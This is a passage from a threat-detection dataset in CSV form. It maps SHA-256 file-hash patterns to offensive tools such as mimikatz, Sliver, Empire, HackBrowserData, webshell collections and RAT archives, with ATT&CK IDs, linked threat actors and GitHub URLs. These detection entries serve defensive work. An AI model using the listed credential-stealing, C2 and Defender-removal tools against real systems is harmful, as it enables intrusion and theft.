TA0010","N/A","N/A","Defense 
Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28384" "*6ab49d8b-a009-44e4-bd53-fbdb48fbe7eb*",".{0,1000}6ab49d8b\-a009\-44e4\-bd53\-fbdb48fbe7eb.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#content","test password","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28385" "*6ac46beb56b053bac9e406bc16131669c93c8f578a3cdc467821ed07c03e596a*",".{0,1000}6ac46beb56b053bac9e406bc16131669c93c8f578a3cdc467821ed07c03e596a.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","28389" "*6ac4ea67fb65559c2e36fb651cdd4ebcf4817f1e8109db5b0df0a010cb3b95e0*",".{0,1000}6ac4ea67fb65559c2e36fb651cdd4ebcf4817f1e8109db5b0df0a010cb3b95e0.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28390" "*6ac7c6229db63b7fe25b570e1b084ec373169f57479d8a3ff7ebeaaac440fafe*",".{0,1000}6ac7c6229db63b7fe25b570e1b084ec373169f57479d8a3ff7ebeaaac440fafe.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - 
TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","28391" "*6ac9d19e7e7f05803c114b0a76b881f3536d1cc85198f1129d75a91c5efa6aa8*",".{0,1000}6ac9d19e7e7f05803c114b0a76b881f3536d1cc85198f1129d75a91c5efa6aa8.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","28392" "*6ae1f12ee3a93a2eb5375d65509afd69c5b34bda454d44c585793f112714d4e1*",".{0,1000}6ae1f12ee3a93a2eb5375d65509afd69c5b34bda454d44c585793f112714d4e1.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","28394" "*6ae454a1437a68e791160c093bb80d0acc962d8116ae672421e40fc418cdc4fd*",".{0,1000}6ae454a1437a68e791160c093bb80d0acc962d8116ae672421e40fc418cdc4fd.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28395" 
"*6b0a9af5eea28129fff4c32a284672000e7ac7d968469d23c5aa341eb1eea262*",".{0,1000}6b0a9af5eea28129fff4c32a284672000e7ac7d968469d23c5aa341eb1eea262.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28396" "*6b1017d1325f9f981edbaf071defdda45e26af30eb2a6819c039a6a17e8a14c7*",".{0,1000}6b1017d1325f9f981edbaf071defdda45e26af30eb2a6819c039a6a17e8a14c7.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","28397" "*6b1999feac59cbb6e99129a25ffadff086bd232d7bcf05d4e6e004ce2901a3eb*",".{0,1000}6b1999feac59cbb6e99129a25ffadff086bd232d7bcf05d4e6e004ce2901a3eb.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","28398" "*6b2324bb337f722067e6c1b5cef5f64e89338e2beccf95289aaaa2af8a0556b9*",".{0,1000}6b2324bb337f722067e6c1b5cef5f64e89338e2beccf95289aaaa2af8a0556b9.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28399" "*6b2f186837bba117f38583e6f176c56cb59e0d1bff76f5b8ad538977f00b49d1*",".{0,1000}6b2f186837bba117f38583e6f176c56cb59e0d1bff76f5b8ad538977f00b49d1.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","28402" "*6b30df4eb8183003bea2c86c7c52b5e555a56b3f127715a0ebf0afb22b719972*",".{0,1000}6b30df4eb8183003bea2c86c7c52b5e555a56b3f127715a0ebf0afb22b719972.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28404" "*6b34ffba8e7ce5f0e5e7c157d7e65d320850c98de350d332421e8373aa9fa3a4*",".{0,1000}6b34ffba8e7ce5f0e5e7c157d7e65d320850c98de350d332421e8373aa9fa3a4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28405" "*6b3d229a02f91fbac23a4385a1b8ca8fe851c9c99c94341dfc5fda41cecc1283*",".{0,1000}6b3d229a02f91fbac23a4385a1b8ca8fe851c9c99c94341dfc5fda41cecc1283.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","28407" "*6b45295ad89a7ecb49f612579ee05ea4b8617ac14f7026f15dc3395244b44c99*",".{0,1000}6b45295ad89a7ecb49f612579ee05ea4b8617ac14f7026f15dc3395244b44c99.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","28408" "*6b494408f85854b48cba397472c9da57a5757305bb7759c1b2abbff9dcf9f649*",".{0,1000}6b494408f85854b48cba397472c9da57a5757305bb7759c1b2abbff9dcf9f649.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by 
abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","28409" "*6b49ab14afa0c2764f31c768dcc45b7efee3967d3cd4f572c4bb99cc4e128c38*",".{0,1000}6b49ab14afa0c2764f31c768dcc45b7efee3967d3cd4f572c4bb99cc4e128c38.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","28410" "*6b4a7999ab5fa112e69ea99a01bcf41a23c8a01780f96eb1647fa98b80694113*",".{0,1000}6b4a7999ab5fa112e69ea99a01bcf41a23c8a01780f96eb1647fa98b80694113.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","28411" "*6b546e78cc7821b63192bb8e087c133e8702a377d17baaeb64b13f0dd61e2347*",".{0,1000}6b546e78cc7821b63192bb8e087c133e8702a377d17baaeb64b13f0dd61e2347.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28412" 
"*6b5477e05628d2f5c4bb2a03556dc46642e986e78d98cb4a95fa5cd49457a171*",".{0,1000}6b5477e05628d2f5c4bb2a03556dc46642e986e78d98cb4a95fa5cd49457a171.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","28413" "*6b5675be7aa2c43191262f462d98730f2672d54869577e44bcbb18984544ac11*",".{0,1000}6b5675be7aa2c43191262f462d98730f2672d54869577e44bcbb18984544ac11.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","28414" "*6b6951ec4a702ae5c22c9d7589621cef36e055fda1f5eb5cc9709dfb5d514148*",".{0,1000}6b6951ec4a702ae5c22c9d7589621cef36e055fda1f5eb5cc9709dfb5d514148.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28416" "*6b6ae7b2bf3914eead08418884e8ad8121d7f5649424cf57888a884f1461f9a5*",".{0,1000}6b6ae7b2bf3914eead08418884e8ad8121d7f5649424cf57888a884f1461f9a5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28417" "*6b6aede14ee7f52374cf3fbc5d790afa32f23dc0791514ce26306514e4a22ee4*",".{0,1000}6b6aede14ee7f52374cf3fbc5d790afa32f23dc0791514ce26306514e4a22ee4.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#filehash","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","28418" "*6b7819ab7d2400b9da53cc075e67d32d06a29c647afd19ba21c2197ee11f5182*",".{0,1000}6b7819ab7d2400b9da53cc075e67d32d06a29c647afd19ba21c2197ee11f5182.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - 
LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","28419" "*6b816c41bab51043022a96f74980439be30aa8af02a1aac0ee56912a710115af*",".{0,1000}6b816c41bab51043022a96f74980439be30aa8af02a1aac0ee56912a710115af.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","#filehash","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","28420" "*6b840eb34526b58124cca1fee8c3999e008c49afd9cfc896e820f294231232cf*",".{0,1000}6b840eb34526b58124cca1fee8c3999e008c49afd9cfc896e820f294231232cf.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","28421" "*6b8453724d41251986a3dc94f0e725d07a4c1b9171228e89ee8ef0daef3b0b2c*",".{0,1000}6b8453724d41251986a3dc94f0e725d07a4c1b9171228e89ee8ef0daef3b0b2c.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - 
T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","28422" "*6b8453724d41251986a3dc94f0e725d07a4c1b9171228e89ee8ef0daef3b0b2c*",".{0,1000}6b8453724d41251986a3dc94f0e725d07a4c1b9171228e89ee8ef0daef3b0b2c.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt 
Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","28423" "*6b9093336ef9693a155bf5b514705424177b9d48679ddb809d18a75501c1041f*",".{0,1000}6b9093336ef9693a155bf5b514705424177b9d48679ddb809d18a75501c1041f.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","28424" "*6b93d86d6d72b894fbcc5f895ccfd701605fe1047398d17c3c6ba1159ad6ee4c*",".{0,1000}6b93d86d6d72b894fbcc5f895ccfd701605fe1047398d17c3c6ba1159ad6ee4c.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28425" "*6b945fec14f309058ac5db5ff19254b5aa3facfc9c68b44b4c926cb9336529a2*",".{0,1000}6b945fec14f309058ac5db5ff19254b5aa3facfc9c68b44b4c926cb9336529a2.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28426" "*6b95cd81ca4f309ac9f243ae73d2e8099634aaffead5b7b214bfcd14b6d604f6*",".{0,1000}6b95cd81ca4f309ac9f243ae73d2e8099634aaffead5b7b214bfcd14b6d604f6.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database 
from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","#filehash","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","28427" "*6b9c155d3ce702c042f0ce00d42909fd7fb0a3f37e2f477dbdb40b0881d4e2d5*",".{0,1000}6b9c155d3ce702c042f0ce00d42909fd7fb0a3f37e2f477dbdb40b0881d4e2d5.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","28429" "*6ba3ca97783fab63b22995124ef0472633762b2364f1d2a1a0bafb2983777ad9*",".{0,1000}6ba3ca97783fab63b22995124ef0472633762b2364f1d2a1a0bafb2983777ad9.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28430" "*6baa01602cddc4d7a7d85626ab56c3a5e5f4abafef152af6304e2caa62d7ff9b*",".{0,1000}6baa01602cddc4d7a7d85626ab56c3a5e5f4abafef152af6304e2caa62d7ff9b.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - 
LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","28432" "*6babb664a4c688234f19f258d7a4de2ffd2b8eb51a9ae6c35ea0bee20d214453*",".{0,1000}6babb664a4c688234f19f258d7a4de2ffd2b8eb51a9ae6c35ea0bee20d214453.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","28433" "*6bbcf0ee5f4adf9d64d66bc8457ac414830c869ad8a688c86099b41b0328a0b7*",".{0,1000}6bbcf0ee5f4adf9d64d66bc8457ac414830c869ad8a688c86099b41b0328a0b7.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","28435" "*6bd11a9b68e81660518ccc9888cf6ea1f2d85c5bb33857f543298c2386e07bdf*",".{0,1000}6bd11a9b68e81660518ccc9888cf6ea1f2d85c5bb33857f543298c2386e07bdf.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","28436" "*6be513459b23f6fe5bbf0f7654882a2a5a2cb1d19e873e6501fe9768f26c2119*",".{0,1000}6be513459b23f6fe5bbf0f7654882a2a5a2cb1d19e873e6501fe9768f26c2119.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28437" "*6be97bfbc4bdb40ea061c20d75d0c812de61b262c96f891a438fdd280aad4c6f*",".{0,1000}6be97bfbc4bdb40ea061c20d75d0c812de61b262c96f891a438fdd280aad4c6f.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","28439" "*6bf16a634af95469401406492913ac1b8e1cc2b9e0e2008be1cf71e81a1e87be*",".{0,1000}6bf16a634af95469401406492913ac1b8e1cc2b9e0e2008be1cf71e81a1e87be.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use 
